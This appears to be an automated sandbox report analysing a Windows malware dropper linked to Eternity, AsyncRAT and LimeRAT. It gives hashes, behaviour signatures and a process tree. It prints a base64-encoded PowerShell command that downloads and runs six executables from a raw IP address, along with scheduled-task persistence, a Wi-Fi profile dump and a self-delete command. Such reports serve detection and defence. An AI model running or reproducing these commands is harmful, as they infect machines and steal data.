Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
21-08-2023 13:40
Static task
static1
Behavioral task
behavioral1
Sample
a76c1125dacfbc3915da530751b42959.bin.exe
Resource
win7-20230712-en
General
-
Target
a76c1125dacfbc3915da530751b42959.bin.exe
-
Size
70KB
-
MD5
a76c1125dacfbc3915da530751b42959
-
SHA1
5d7e45a1e91f30f69c585b85676c30969f7227de
-
SHA256
9ab7986388ed985549037d1aa7663f59281f7babdaf9a5312e9653eefc88f7c0
-
SHA512
f606b6280156d5de5ef19b9a24e32cacf871673b8474d3cedbdb59df94fbae41d855db4dde2e7aa97cde6c911408fe2fd9fa10ee0ec342f728371a01df4d40b5
-
SSDEEP
768:GI8h1BxX3dkIoBQ+0fc246aVKyFVKR27z3mO9RQvrEa7xAy4C3XMcS+WRnK4w:f8vdkiCKy+u9RQvTA9rcS+5
Malware Config
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Async RAT payload 13 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\1.exe asyncrat C:\Users\Admin\AppData\Local\Temp\1.exe asyncrat C:\Users\Admin\AppData\Local\Temp\1.exe asyncrat \Users\Admin\AppData\Local\Temp\3.exe asyncrat C:\Users\Admin\AppData\Local\Temp\3.exe asyncrat behavioral1/memory/2948-96-0x0000000001330000-0x0000000001380000-memory.dmp asyncrat C:\Users\Admin\AppData\Local\Temp\3.exe asyncrat behavioral1/memory/2728-114-0x00000000003A0000-0x00000000003E2000-memory.dmp asyncrat C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe asyncrat C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe asyncrat \Users\Admin\AppData\Roaming\DefenderEsxi.exe asyncrat C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe asyncrat behavioral1/memory/2644-174-0x0000000000120000-0x0000000000170000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2292 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 27 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\1.exe net_reactor C:\Users\Admin\AppData\Local\Temp\1.exe net_reactor C:\Users\Admin\AppData\Local\Temp\1.exe net_reactor \Users\Admin\AppData\Local\Temp\2.exe net_reactor C:\Users\Admin\AppData\Local\Temp\2.exe net_reactor C:\Users\Admin\AppData\Local\Temp\2.exe net_reactor \Users\Admin\AppData\Local\Temp\2.exe net_reactor C:\Users\Admin\AppData\Local\Temp\2.exe net_reactor \Users\Admin\AppData\Local\Temp\3.exe net_reactor C:\Users\Admin\AppData\Local\Temp\3.exe net_reactor behavioral1/memory/2948-96-0x0000000001330000-0x0000000001380000-memory.dmp net_reactor behavioral1/memory/2876-94-0x00000000003F0000-0x0000000000432000-memory.dmp net_reactor C:\Users\Admin\AppData\Local\Temp\3.exe net_reactor behavioral1/memory/2728-114-0x00000000003A0000-0x00000000003E2000-memory.dmp net_reactor C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe net_reactor \Users\Admin\AppData\Roaming\DiscordUppdataRas.exe net_reactor C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe net_reactor C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe net_reactor \Users\Admin\AppData\Roaming\DiscordUppdataRas.exe net_reactor behavioral1/memory/2792-168-0x0000000000BF0000-0x0000000000C32000-memory.dmp net_reactor behavioral1/memory/2792-170-0x0000000004D90000-0x0000000004DD0000-memory.dmp net_reactor C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe net_reactor \Users\Admin\AppData\Roaming\DefenderEsxi.exe net_reactor C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe net_reactor behavioral1/memory/2644-174-0x0000000000120000-0x0000000000170000-memory.dmp net_reactor behavioral1/memory/2644-176-0x00000000047B0000-0x00000000047F0000-memory.dmp net_reactor behavioral1/memory/2792-179-0x0000000004D90000-0x0000000004DD0000-memory.dmp net_reactor -
Executes dropped EXE 8 IoCs
Processes:
1.exe2.exe3.exe4.exe5.exe6.exeDiscordUppdataRas.exeDefenderEsxi.exepid process 2948 1.exe 2876 2.exe 2728 3.exe 2772 4.exe 804 5.exe 1536 6.exe 2792 DiscordUppdataRas.exe 2644 DefenderEsxi.exe -
Loads dropped DLL 11 IoCs
Processes:
powershell.exe2.execmd.exepid process 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2876 2.exe 2876 2.exe 1628 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2496 schtasks.exe 1992 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1272 timeout.exe -
Processes:
4.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde 4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 4.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exe5.exe4.exe1.exeDiscordUppdataRas.exepid process 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 804 5.exe 804 5.exe 2772 4.exe 2948 1.exe 2948 1.exe 2948 1.exe 2792 DiscordUppdataRas.exe 2792 DiscordUppdataRas.exe 2792 DiscordUppdataRas.exe 2792 DiscordUppdataRas.exe 2792 DiscordUppdataRas.exe 2792 DiscordUppdataRas.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
powershell.exe4.exe3.exe5.exe1.exeDiscordUppdataRas.exeDefenderEsxi.exedescription pid process Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 2772 4.exe Token: SeDebugPrivilege 2728 3.exe Token: SeDebugPrivilege 804 5.exe Token: SeIncreaseQuotaPrivilege 2728 3.exe Token: SeSecurityPrivilege 2728 3.exe Token: SeTakeOwnershipPrivilege 2728 3.exe Token: SeLoadDriverPrivilege 2728 3.exe Token: SeSystemProfilePrivilege 2728 3.exe Token: SeSystemtimePrivilege 2728 3.exe Token: SeProfSingleProcessPrivilege 2728 3.exe Token: SeIncBasePriorityPrivilege 2728 3.exe Token: SeCreatePagefilePrivilege 2728 3.exe Token: SeBackupPrivilege 2728 3.exe Token: SeRestorePrivilege 2728 3.exe Token: SeShutdownPrivilege 2728 3.exe Token: SeDebugPrivilege 2728 3.exe Token: SeSystemEnvironmentPrivilege 2728 3.exe Token: SeRemoteShutdownPrivilege 2728 3.exe Token: SeUndockPrivilege 2728 3.exe Token: SeManageVolumePrivilege 2728 3.exe Token: 33 2728 3.exe Token: 34 2728 3.exe Token: 35 2728 3.exe Token: SeIncreaseQuotaPrivilege 2728 3.exe Token: SeSecurityPrivilege 2728 3.exe Token: SeTakeOwnershipPrivilege 2728 3.exe Token: SeLoadDriverPrivilege 2728 3.exe Token: SeSystemProfilePrivilege 2728 3.exe Token: SeSystemtimePrivilege 2728 3.exe Token: SeProfSingleProcessPrivilege 2728 3.exe Token: SeIncBasePriorityPrivilege 2728 3.exe Token: SeCreatePagefilePrivilege 2728 3.exe Token: SeBackupPrivilege 2728 3.exe Token: SeRestorePrivilege 2728 3.exe Token: SeShutdownPrivilege 2728 3.exe Token: SeDebugPrivilege 2728 3.exe Token: SeSystemEnvironmentPrivilege 2728 3.exe Token: SeRemoteShutdownPrivilege 2728 3.exe Token: SeUndockPrivilege 2728 3.exe Token: SeManageVolumePrivilege 2728 3.exe Token: 33 2728 3.exe Token: 34 2728 3.exe Token: 35 2728 3.exe Token: SeDebugPrivilege 2948 1.exe Token: SeDebugPrivilege 2792 DiscordUppdataRas.exe Token: SeDebugPrivilege 2792 DiscordUppdataRas.exe Token: SeDebugPrivilege 2644 DefenderEsxi.exe Token: SeDebugPrivilege 2644 DefenderEsxi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a76c1125dacfbc3915da530751b42959.bin.exepowershell.exe4.execmd.execmd.exe2.exe1.execmd.exedescription pid process target process PID 1368 wrote to memory of 2292 1368 a76c1125dacfbc3915da530751b42959.bin.exe powershell.exe PID 1368 wrote to memory of 2292 1368 a76c1125dacfbc3915da530751b42959.bin.exe powershell.exe PID 1368 wrote to memory of 2292 1368 a76c1125dacfbc3915da530751b42959.bin.exe powershell.exe PID 1368 wrote to memory of 2292 1368 a76c1125dacfbc3915da530751b42959.bin.exe powershell.exe PID 2292 wrote to memory of 2948 2292 powershell.exe 1.exe PID 2292 wrote to memory of 2948 2292 powershell.exe 1.exe PID 2292 wrote to memory of 2948 2292 powershell.exe 1.exe PID 2292 wrote to memory of 2948 2292 powershell.exe 1.exe PID 2292 wrote to memory of 2876 2292 powershell.exe 2.exe PID 2292 wrote to memory of 2876 2292 powershell.exe 2.exe PID 2292 wrote to memory of 2876 2292 powershell.exe 2.exe PID 2292 wrote to memory of 2876 2292 powershell.exe 2.exe PID 2292 wrote to memory of 2728 2292 powershell.exe 3.exe PID 2292 wrote to memory of 2728 2292 powershell.exe 3.exe PID 2292 wrote to memory of 2728 2292 powershell.exe 3.exe PID 2292 wrote to memory of 2728 2292 powershell.exe 3.exe PID 2292 wrote to memory of 2772 2292 powershell.exe 4.exe PID 2292 wrote to memory of 2772 2292 powershell.exe 4.exe PID 2292 wrote to memory of 2772 2292 powershell.exe 4.exe PID 2292 wrote to memory of 2772 2292 powershell.exe 4.exe PID 2292 wrote to memory of 804 2292 powershell.exe 5.exe PID 2292 wrote to memory of 804 2292 powershell.exe 5.exe PID 2292 wrote to memory of 804 2292 powershell.exe 5.exe PID 2292 wrote to memory of 804 2292 powershell.exe 5.exe PID 2292 wrote to memory of 1536 2292 powershell.exe 6.exe PID 2292 wrote to memory of 1536 2292 powershell.exe 6.exe PID 2292 wrote to memory of 1536 2292 powershell.exe 6.exe PID 2292 wrote to memory of 1536 2292 powershell.exe 6.exe PID 2772 wrote to memory of 2176 2772 4.exe cmd.exe PID 2772 wrote to memory of 2176 2772 4.exe cmd.exe PID 2772 wrote to memory of 2176 2772 4.exe cmd.exe PID 2176 wrote to memory of 1516 2176 cmd.exe chcp.com PID 2176 wrote to memory of 1516 2176 cmd.exe chcp.com PID 2176 wrote to memory of 1516 2176 cmd.exe chcp.com PID 2176 wrote to memory of 2364 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 2364 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 2364 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 2124 2176 cmd.exe findstr.exe PID 2176 wrote to memory of 2124 2176 cmd.exe findstr.exe PID 2176 wrote to memory of 2124 2176 cmd.exe findstr.exe PID 2772 wrote to memory of 948 2772 4.exe cmd.exe PID 2772 wrote to memory of 948 2772 4.exe cmd.exe PID 2772 wrote to memory of 948 2772 4.exe cmd.exe PID 948 wrote to memory of 2504 948 cmd.exe chcp.com PID 948 wrote to memory of 2504 948 cmd.exe chcp.com PID 948 wrote to memory of 2504 948 cmd.exe chcp.com PID 948 wrote to memory of 2432 948 cmd.exe PING.EXE PID 948 wrote to memory of 2432 948 cmd.exe PING.EXE PID 948 wrote to memory of 2432 948 cmd.exe PING.EXE PID 2876 wrote to memory of 2496 2876 2.exe schtasks.exe PID 2876 wrote to memory of 2496 2876 2.exe schtasks.exe PID 2876 wrote to memory of 2496 2876 2.exe schtasks.exe PID 2876 wrote to memory of 2496 2876 2.exe schtasks.exe PID 2948 wrote to memory of 2592 2948 1.exe cmd.exe PID 2948 wrote to memory of 2592 2948 1.exe cmd.exe PID 2948 wrote to memory of 2592 2948 1.exe cmd.exe PID 2948 wrote to memory of 2592 2948 1.exe cmd.exe PID 2876 wrote to memory of 2792 2876 2.exe DiscordUppdataRas.exe PID 2876 wrote to memory of 2792 2876 2.exe DiscordUppdataRas.exe PID 2876 wrote to memory of 2792 2876 2.exe DiscordUppdataRas.exe PID 2876 wrote to memory of 2792 2876 2.exe DiscordUppdataRas.exe PID 2592 wrote to memory of 1992 2592 cmd.exe schtasks.exe PID 2592 wrote to memory of 1992 2592 cmd.exe schtasks.exe PID 2592 wrote to memory of 1992 2592 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a76c1125dacfbc3915da530751b42959.bin.exe"C:\Users\Admin\AppData\Local\Temp\a76c1125dacfbc3915da530751b42959.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZABhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADgANwAuADUAMQAuADIAMQA1AC8AMQAuAGUAeABlACcALAAgADwAIwB1AGoAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAagBtACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAZQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAKQA8ACMAYQBhAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AOAA3AC4ANQAxAC4AMgAxADUALwAyAC4AZQB4AGUAJwAsACAAPAAjAHIAaQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB4AHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgBxAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAuAGUAeABlACcAKQApADwAIwBxAHAAYQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgA4ADcALgA1ADEALgAyADEANQAvADMALgBlAHgAZQAnACwAIAA8ACMAcABuAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGgAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHIAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAHkAYgBxACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADgANwAuADUAMQAuADIAMQA1AC8ANAAuAGUAeABlACcALAAgADwAIwB6AGsAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAcgB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAdQB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAZABwAHQAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AOAA3AC4ANQAxAC4AMgAxADUALwA1AC4AZQB4AGUAJwAsACAAPAAjAGwAcgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBjAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBkAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQApADwAIwB6AG4AdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgA4ADcALgA1ADEALgAyADEANQAvADYALgBlAHgAZQAnACwAIAA8ACMAcQB2AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGMAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAGcAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApACkAPAAjAHYAcABmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGoAcgBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAHAAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApADwAIwB1AGgAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBxAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAuAGUAeABlACcAKQA8ACMAZgBuAHYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcgBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGYAcQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMALgBlAHgAZQAnACkAPAAjAHIAdABwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAYgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB6AHAAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AC4AZQB4AGUAJwApADwAIwBiAG4AeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHEAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBpAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQA8ACMAdgBkAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBuAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAYgBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYALgBlAHgAZQAnACkAPAAjAGsAdAByACMAPgA="2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DefenderEsxi" /tr '"C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "DefenderEsxi" /tr '"C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"'5⤵
- Creates scheduled task(s)
PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7446.tmp.bat""4⤵
- Loads dropped DLL
PID:1628 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1272
-
-
C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe'"4⤵
- Creates scheduled task(s)
PID:2496
-
-
C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe"C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:1516
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵PID:2364
-
-
C:\Windows\system32\findstr.exefindstr All5⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\4.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:2504
-
-
C:\Windows\system32\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:2432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"3⤵
- Executes dropped EXE
PID:1536
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
294KB
MD52d17306f11167cbbfd6758cfa08ea1cc
SHA1024fa5f6b970601b71dbbb961c5da693d3b61547
SHA256e05d5107861f17ad26b7fec4ed0b48797b1e427f46b8c66e0ee410f354b5b8cf
SHA512715e4bbc55c653f4ba4711fee99a58c99db57240d1a4ee8fdf25852d6e97032f884d1761595081aa687f46c43da843bbe11b4a80adc79da540c18c2aaf50faff
-
Filesize
294KB
MD52d17306f11167cbbfd6758cfa08ea1cc
SHA1024fa5f6b970601b71dbbb961c5da693d3b61547
SHA256e05d5107861f17ad26b7fec4ed0b48797b1e427f46b8c66e0ee410f354b5b8cf
SHA512715e4bbc55c653f4ba4711fee99a58c99db57240d1a4ee8fdf25852d6e97032f884d1761595081aa687f46c43da843bbe11b4a80adc79da540c18c2aaf50faff
-
Filesize
247KB
MD5eb2bc869689c92c21e68f3e684ccea37
SHA154ed976bccb60e2ff754c94310a913c3063316a0
SHA256fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd07c75c6ec44e3e8736c
SHA51246d322eefc0eee6555d08a0cb0cdf2e6b1a3400bdc447499484cdd2800c569c73b95e0759f6984c7af38dbb9ba5a8d4ddb5796cd8cc9b0d9bf86f39f16db58a5
-
Filesize
247KB
MD5eb2bc869689c92c21e68f3e684ccea37
SHA154ed976bccb60e2ff754c94310a913c3063316a0
SHA256fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd07c75c6ec44e3e8736c
SHA51246d322eefc0eee6555d08a0cb0cdf2e6b1a3400bdc447499484cdd2800c569c73b95e0759f6984c7af38dbb9ba5a8d4ddb5796cd8cc9b0d9bf86f39f16db58a5
